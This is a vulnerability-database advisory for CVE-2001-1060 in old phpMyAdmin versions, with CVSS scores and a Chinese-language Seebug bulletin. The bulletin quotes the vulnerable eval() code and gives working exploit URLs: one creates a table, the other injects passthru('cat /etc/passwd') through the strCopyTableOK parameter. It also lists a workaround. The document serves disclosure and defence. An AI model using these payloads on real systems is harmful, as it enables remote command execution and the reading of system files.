Vulnerabilities > CVE-2001-1060 - Unspecified vulnerability in PHPmyadmin

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
phpmyadmin

Summary

phpMyAdmin 2.2.0rc3 and earlier allows remote attackers to execute arbitrary commands by inserting them into (1) the strCopyTableOK argument in tbl_copy.php, or (2) the strRenameTableOK argument in tbl_rename.php.

Seebug

bulletinFamilyexploit
descriptionBugCVE: CAN-2001-1060 BUGTRAQ: 3121 phpMyAdmin中存在一个输入验证错误,允许远程攻击者执行任意命令。攻击者可能获取 敏感信息或者以httpd运行身份执行任意命令。 问题处在'tbl_copy.php' 和 'tbl_rename.php'中的下列代码中: tbl_copy.php: eval( \$message = \ $strCopyTableOK\ ; ); tbl_rename.php: eval( \$message = \ $strRenameTableOK\ ; ); 如果用户可以控制$strCopyTableOK 或 $strRenameTableOK的内容,就可能利用eval() 执行任意代码。但是直接利用: http://victim/phpmyadmin/tbl_copy.php?strCopyTableOK= .passthru('cat%20/etc/passwd'). 这样的URL并不能真正执行cat命令。这是因为在执行eval()函数之前,phpMyAdmin会检查 mysql请求是否正常返回,如果没有正常返回,程序会终止。因此,攻击者必须首先要有一个 允许创建表的数据库。攻击者可以使用下列URL来在 test 库中创建一个表(haxor): http://victim/phpmyadmin/tbl_create.php?db=test&amp;table=haxor&amp;query=dummy+integer+ primary+key+auto_increment&amp;submit=1 这样攻击者就可以进行真正的攻击了: http://victim/phpmyadmin/tbl_copy.php?db=test&amp;table=haxor&amp;new_name=test.haxor2&amp; strCopyTableOK= .passthru('cat%20/etc/passwd'). 2.0-2.2rc3 临时解决方法: 在'tbl_copy.php' 和 'tbl_rename.php'中的问题行(包含eval函数的行)前面加 ‘#’来注释调问题行。 厂商补丁: 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商 的主页以获取最新版本: <a href=http://www.phpwizard.net/projects/phpMyAdmin/ target=_blank>http://www.phpwizard.net/projects/phpMyAdmin/</a>
idSSV:4332
last seen2017-11-19
modified2008-10-26
published2008-10-26
reporterRoot
titlephpMyAdmin执行任意命令漏洞